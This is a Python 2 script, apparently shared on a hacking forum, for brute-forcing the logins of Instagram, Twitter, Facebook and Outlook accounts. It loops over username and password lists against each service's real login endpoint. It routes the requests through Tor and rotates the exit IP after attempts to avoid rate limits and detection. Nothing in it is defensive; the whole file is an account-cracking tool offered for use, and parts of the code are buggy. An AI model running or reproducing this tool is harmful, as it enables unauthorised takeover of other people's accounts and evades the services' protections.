#!/usr/bin/pythonimport socket, socks , time , sys, os, re, requests.packages.

1. #!/usr/bin/python
2. import socket, socks , time , sys, os, re, requests.packages.urllib3
3. import requests as xsec
4. from stem import Signal
5. from stem.control import Controller
6.  
7. title = '''
8. ******************************************************
9.                                                                ,,
10.               .S"""sss                                        (OO)  tt
11.              ,SS    "S                                              TT
12. `XX'   `XX'   `SSs.      .eE"Ee   ,cc"cc `UUU  `UUU  `RRr,rrr `III ttTTtt `YY'   `YY'
13.  `XX ,X'       `SSSSs. ,E'   Ee CC'  CC   UU    UU    RR' "'   II   TT     YY   ,Y
14.    XXX ----- .     `SS EE"""""" CC        UU    UU    RR       II   TT      YY ,Y
15.  ,X' XX.     Ss     sS EE.    , CC.    ,  UU    UU    RR       II   TT       YYY
16. .XX.   .XX.   S"Sssss"  `Eeeee'   CCccc'  `Uuuu"UUU. .RRRR.   .IIII. `Tttt    ,Y
17. [*] Coded By: xSecurity Twitter (@xseclabs)                                  ,Y
18. [*] BruteForce Project Connect W/ [TOR]                                    YYy"
19. [!] sec4ever.com
20. [!] WORKING WITH TOR ONLY !!
21. ******************************************************
22. '''
23. usernameList = open('username.txt','r').read().splitlines()
24. passwordList = open('password.txt','r').read().splitlines()
25.  
26. print title
27. print '''
28. Options :
29. 1 > Instagram BruteForce [ Work W/ Status Result ]
30. 2 > Twitter BruteForce
31. 3 > Facebook BruteForce
32. 4 > Outlook BruteForce
33. e > exit
34. '''
35. b0x = raw_input("Enter : ")
36. def instagram():
37.     tag = "-" * 10
38.     get = xsec.get("https://www.instagram.com/accounts/login").text
39.     x = re.findall('"csrf_token": "(.*?)"', get)
40.     csrf = x[0]
41.  
42.     headers = {
43.     "Host": "www.instagram.com",
44.     "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0",
45.     "Accept": "*/*",
46.     "Accept-Language": "en-US,en;q=0.5",
47.     "Accept-Encoding": "gzip, deflate, br",
48.     "X-CSRFToken": csrf,
49.     "X-Instagram-AJAX": 1,
50.     "Content-Type": "application/x-www-form-urlencoded",
51.     "X-Requested-With": "XMLHttpRequest",
52.     "Referer": "https://www.instagram.com/accounts/login/",
53.     "Cookie": "csrftoken="+csrf+";" "mid=;" "ig_vw=1440; ig_pr=1",
54.     "Connection": "keep-alive",
55.     "If-Modified-Since": "*",}
56.  
57.     with Controller.from_port(port = 9151) as controller:
58.         for username in usernameList:
59.             for password in passwordList:
60.                 controller.authenticate(password="123")
61.                 socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 9050)
62.                 socket.socket = socks.socksocket
63.                 post = {}
64.                 post["username"] = username,
65.                 post["password"] = password
66.                 get2 = xsec.post("https://www.instagram.com/accounts/login/ajax/", data=post, headers=headers).text
67.                 print "Username: "+username+" | Password: "+password
68.                 print "Status : "+get2
69.                 time.sleep(9)
70.                 controller.signal("NEWNYM")
71.  
72. def twitter():
73.     tag = "-" * 10
74.     with Controller.from_port(port = 9151) as controller:
75.         requests.packages.urllib3.disable_warnings() # disable SSL error ;)
76.         for username in usernameList:
77.             for password in passwordList:
78.                 controller.authenticate(password="123")
79.                 socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 9050)
80.                 socket.socket = socks.socksocket
81.                 url = "https://"+username+":"+password+"@stream.twitter.com/1/statuses/filter.json"
82.                 get = xsec.get(url, verify=False).text
83.                 if 'Unknown' in get:
84.                     print tag+"\n[+] Cracked: "+username+" : "+password+" [+]\n"+tag
85.                     break
86.                     return
87.                 else:
88.                     print '[-] Trying '+username+" : "+password
89.                 time.sleep(9)
90.                 controller.signal("NEWNYM")
91. def facebook():
92.     tags = "-" * 10
93.     with Controller.from_port(port = 9151) as controller:
94.         requests.packages.urllib3.disable_warnings()
95.         for username in usernameList:
96.             for password in passwordList:
97.                 controller.authenticate(password="123")
98.                 socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 9050)
99.                 socket.socket = socks.socksocket
100.                 url = xsec.get("https://mbasic.facebook.com/login").text
101.                 h1 = re.findall('input type="hidden" name="lsd" value="(.*?)" autocomplete="off" /', url)
102.                 h2 = re.findall('input type="hidden" name="m_ts" value="(.*?)" />', url)
103.                 h3 = re.findall('input type="hidden" name="li" value="(.*?)" />', url)
104.                 post = {}
105.                 post["lsd"] = h1,
106.                 post["m_ts"] = h2,
107.                 post["li"] = h3,
108.                 post["email"] = username,
109.                 post["pass"] = password,
110.                 post["login"] = "%D8%AA%D8%B3%D8%AC%D9%8A%D9%84+%D8%A7%D9%84%D8%AF%D8%AE%D9%88%D9%84"
111.                 b0x3d = xsec.post("https://mbasic.facebook.com/login.php?refsrc=https%3A%2F%2Fmbasic.facebook.com%2Flogin&lwv=100&login_try_number=1", data=post).text
112.                 if 'incorrect' not in b0x3d:
113.                     print tag+"\n[+] Cracked: "+username+" : "+password+" [+]\n"+tag
114.                     controller.signal("NEWNYM") # change IP
115.                     break
116.                     return
117.                 else:
118.                     print '[-] Trying '+username+" : "+password
119.                     controller.signal("NEWNYM") # change IP
120.  
121. def outlook():
122.     tags = "-" * 10
123.     with Controller.from_port(port = 9151) as controller:
124.         requests.packages.urllib3.disable_warnings() # hide warnings
125.         for username in usernameList:
126.             for password in passwordList:
127.                 controller.authenticate(password="123")
128.                 socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 9050)
129.                 socket.socket = socks.socksocket
130.                 header = {'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0',}
131.                 url = xsec.get('https://eas.outlook.com/Microsoft-Server-ActiveSync?User='+username, auth=(username.strip(), password.strip()) , headers=header)
132.                 if "HTTP" in url.text:
133.                     print tag+"\n[+] Cracked: "+username+" : "+password+" [+]\n"+tag
134.                     controller.signal("NEWNYM")
135.                     break
136.                     return
137.                 else:
138.                     print '[-] Trying '+username+" : "+password
139.                     controller.signal("NEWNYM")
140.  
141.  
142. if b0x == "1":
143.     tag = "#" * 45
144.     print tag +"\n [] [] [] Instagram BruteForce .. [] [] []\n"+tag
145.     instagram()
146. elif b0x == "2":
147.     tag = "#" * 45
148.     print tag +"\n [] [] [] Twitter BruteForce .. [] [] [] \n"+tag
149.     twitter()
150. elif b0x == "3":
151.     tag = "#" * 45
152.     print tag +"\n [] [] [] Facebook BruteForce .. [] [] [] \n"+tag
153.     facebook()
154. elif b0x == "4":
155.     tag = "#" * 45
156.     print tag +"\n [] [] [] Outlook BruteForce .. [] [] [] \n"+tag
157.     outlook()
158. elif b0x == "e":
159.     print 'bye bye ;)'
160.     os.system("exit")